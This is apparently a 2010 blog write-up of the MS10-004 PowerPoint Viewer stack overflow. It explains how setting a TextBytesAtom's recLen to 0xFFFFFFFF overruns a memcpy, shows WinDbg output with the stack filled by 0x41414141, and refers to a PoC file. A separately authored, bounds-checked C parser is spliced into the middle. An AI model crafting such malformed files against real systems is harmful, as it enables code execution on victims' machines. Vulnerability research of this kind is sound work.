2010.03.03

Hi this is Snake,

We are still alive, and I'm here to demonstrate a really cheap bug in MS PPT Viewer (actually just for fun and to show we are alive :P). According to the MS advisory, the vulnerability is triggered in MS PPT Viewer by a specially crafted PPT file. MS also tells us the vulnerable record is the "TextBytesAtom Record" and that it is a "Stack Overflow". Let's take a quick look at the MS Office binary document format :)

TextBytesAtom Record

According to the MS Office documentation, TextBytesAtom is a record that stores the actual characters of the text, not including the trailing return character, as bytes. There are no additional fields in this record, so how can we overflow the buffer? Just by creating a large record? After digging the net for more information, I got some info from ZDI: "Due to the lack of bounds checking on the size argument an unchecked memcpy() copies user data from the file to the stack." But there isn't any size field! Maybe it's in the whole record structure!? Let's look at the "Record Structure" in PPT files:


struct RecordHeader {
    unsigned short recVer : 4;       // psrVersion: low 4 bits of the first 16-bit word
    unsigned short recInstance : 12; // psrInstance: high 12 bits of the same word
    unsigned short recType;          // psrType: record type, e.g. 4008 (0x0FA8) for TextBytesAtom
    unsigned long recLen;            // psrSize: length in bytes of the record data that follows
};

I put some comments on it to make the type definitions more familiar and easier to read :). There are only two interesting fields for us in the record structure: first, recType, which identifies the record type, and second, recLen, which gives the record length. According to the MS docs this atom is of variable length and depends on the length of the text. The recLen field is filled in automatically by PowerPoint when the slide is created, but we can change its value manually at haxoring time :P. I just created a ppt file and filled the title with a bunch of A's.

Now let's take a deeper look:

In the Office docs, TextBytesAtom is represented by 4008 in decimal. You must look for the hex value in the file, which is "A80F" (0x0FA8 stored little-endian). 4008 or A80F is the value of recType in the record structure, and you can see the recLen field value right after A80F. Remember? ZDI mentioned something about the memcpy function. This function takes an unsigned integer (size_t) for its size argument, so what happens if we change recLen to -1? In hex, -1 is represented as 0xFFFFFFFF, and in the unsigned int world that equals 4294967295, the biggest value that can be stored in 4 bytes! Let's try :)
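To make the missing check concrete, here is an added example (my own code, not from the original post or from Microsoft's parser): it reads a RecordHeader from a byte buffer the way the struct above lays it out, and copies a TextBytesAtom payload only after recLen has been checked against both the bytes actually left in the file and the destination capacity. The record bytes, the RT_TEXTBYTESATOM constant and the function names are constructed for illustration; the only value taken from the post is the 0x0FA8 record type.

```c
/* Added example: bounds-checked TextBytesAtom parsing. Not the original
 * post's code; sample records and names are constructed for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define RT_TEXTBYTESATOM 0x0FA8u   /* 4008 decimal, appears as A8 0F in the file */
#define RECORD_HEADER_LEN 8

struct RecordHeader {
    uint16_t recVer;      /* low 4 bits of the first 16-bit word */
    uint16_t recInstance; /* high 12 bits of the first 16-bit word */
    uint16_t recType;
    uint32_t recLen;
};

/* Decode the little-endian 8-byte header. Returns 0 on success, -1 when
 * fewer than 8 bytes remain. */
static int parse_record_header(const uint8_t *buf, size_t len,
                               struct RecordHeader *h) {
    if (len < RECORD_HEADER_LEN) return -1;
    uint16_t w0 = (uint16_t)(buf[0] | (buf[1] << 8));
    h->recVer = (uint16_t)(w0 & 0x000F);
    h->recInstance = (uint16_t)((w0 >> 4) & 0x0FFF);
    h->recType = (uint16_t)(buf[2] | (buf[3] << 8));
    h->recLen = (uint32_t)buf[4] | ((uint32_t)buf[5] << 8) |
                ((uint32_t)buf[6] << 16) | ((uint32_t)buf[7] << 24);
    return 0;
}

/* Copy a TextBytesAtom payload into dst (capacity dst_cap).
 * Returns the number of bytes copied, or -1 when the record is malformed:
 * wrong type, recLen larger than the bytes left after the header, or
 * recLen larger than the destination. The two recLen checks are exactly
 * what an unchecked memcpy(dst, data, recLen) lacks. */
static long read_text_bytes_atom(const uint8_t *rec, size_t rec_len,
                                 uint8_t *dst, size_t dst_cap) {
    struct RecordHeader h;
    if (parse_record_header(rec, rec_len, &h) != 0) return -1;
    if (h.recType != RT_TEXTBYTESATOM) return -1;
    size_t remaining = rec_len - RECORD_HEADER_LEN;
    if (h.recLen > remaining) return -1;  /* claims more data than the file holds */
    if (h.recLen > dst_cap) return -1;    /* would overflow the caller's buffer */
    memcpy(dst, rec + RECORD_HEADER_LEN, h.recLen);
    return (long)h.recLen;
}

/* Constructed sample records: a well-formed atom holding "AAAA", and the
 * same atom with recLen patched to 0xFFFFFFFF (-1). */
static const uint8_t good_record[] = {
    0x00, 0x00, 0xA8, 0x0F, 0x04, 0x00, 0x00, 0x00, 'A', 'A', 'A', 'A' };
static const uint8_t bad_record[] = {
    0x00, 0x00, 0xA8, 0x0F, 0xFF, 0xFF, 0xFF, 0xFF, 'A', 'A', 'A', 'A' };

static long check_good(void) {
    uint8_t out[64];
    return read_text_bytes_atom(good_record, sizeof good_record, out, sizeof out);
}

static long check_bad(void) {
    uint8_t out[64];
    return read_text_bytes_atom(bad_record, sizeof bad_record, out, sizeof out);
}

static uint16_t good_rec_type(void) {
    struct RecordHeader h;
    parse_record_header(good_record, sizeof good_record, &h);
    return h.recType;
}

static uint32_t bad_rec_len(void) {
    struct RecordHeader h;
    parse_record_header(bad_record, sizeof bad_record, &h);
    return h.recLen;
}

int main(void) {
    printf("good record: %ld bytes copied\n", check_good());
    printf("bad record (recLen = 0x%08X): %ld\n", bad_rec_len(), check_bad());
    return 0;
}
```

The header decode reproduces the 4/12-bit split of recVer and recInstance from the struct above, and the rejection path is the one a parser needs before the copy: the claimed length is compared with the bytes that are really present, not trusted because the file said so.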

Good! An AV occurred. Now just a little debugging :)


(e14.e18): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=029a29d0 ebx=00000975 ecx=00000445 edx=00000003 esi=029a18b9 edi=00130000
eip=75e99b60 esp=0012ec44 ebp=0012ec4c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\msvcrt.dll -
msvcrt!memcpy+0x250:
75e99b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd esi
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ole32.dll -
029a18b9  41414141 41414141 410d4141 41414141
029a18c9  41414141 41414141 41414141 41414141
029a18d9  41414141 41414141 41414141 41414141
029a18e9  41414141 41414141 41414141 41414141
029a18f9  41414141 41414141 41414141 41414141
029a1909  4141410d 41414141 41414141 41414141
029a1919  41414141 41414141 41414141 41414141
029a1929  41414141 41414141 41414141 41414141
0:000> dd edi
00130000  78746341 00000020 00000001 00002fb0
00130010  000000dc 00000000 00000020 00000000
00130020  00000014 00000001 00000007 00000034
00130030  0000017c 00000001 00000000 00000000
00130040  00000000 00000000 00000000 00000002
00130050  1a26ef4e 00000298 00000044 000002e0
00130060  00000250 00000000 f33271ba 00000530
00130070  0000004a 0000057c 0000031e 00000000
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec4c 75ba4ab0 0012f0bc 029a0975 0000205b msvcrt!memcpy+0x250
0012ec8c 75ba3757 00000975 0012f0bc 0000205b ole32!StgOpenStorage+0x9ed
0012ecb4 75c1b0a8 04563fb8 00000975 00000000 ole32!StringFromIID+0x3ec
0012eea0 75c1b0ea 00000375 00000001 0012f0bc ole32!WriteClassStm+0x1c11
0012eebc 75c1b142 00000375 00000000 0012f0bc ole32!WriteClassStm+0x1c53
0012eed8 75c1b1d4 00000375 00000000 0012f0bc ole32!WriteClassStm+0x1cab
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Microsoft Office\PowerPoint Viewer\PPTVIEW.EXE -
0012ef1c 300eea00 00000000 0012f0bc ffffffff ole32!WriteClassStm+0x1d3d
0012ef34 300f1212 045607b0 00000000 0012f0bc PPTVIEW+0xeea00
0012ef58 300f9aac 0012f0bc ffffffff 02c19a58 PPTVIEW+0xf1212
0012f14c 41414141 41414141 41414141 41414141 PPTVIEW+0xf9aac
0012f150 41414141 41414141 41414141 41414141 0x41414141
0012f154 41414141 41414141 41414141 41414141 0x41414141
0012f158 41414141 41414141 41414141 41414141 0x41414141
0012f15c 41414141 41414141 41414141 41414141 0x41414141
0012f160 41414141 41414141 41414141 41414141 0x41414141
0012f164 41414141 41414141 41414141 41414141 0x41414141
0012f168 41414141 41414141 41414141 41414141 0x41414141
0012f16c 41414141 41414141 41414141 41414141 0x41414141
0012f170 41414141 41414141 41414141 41414141 0x41414141
0012f174 41414141 41414141 41414141 41414141 0x41414141

have fun :)

PoC file:

presentation_MS10_004
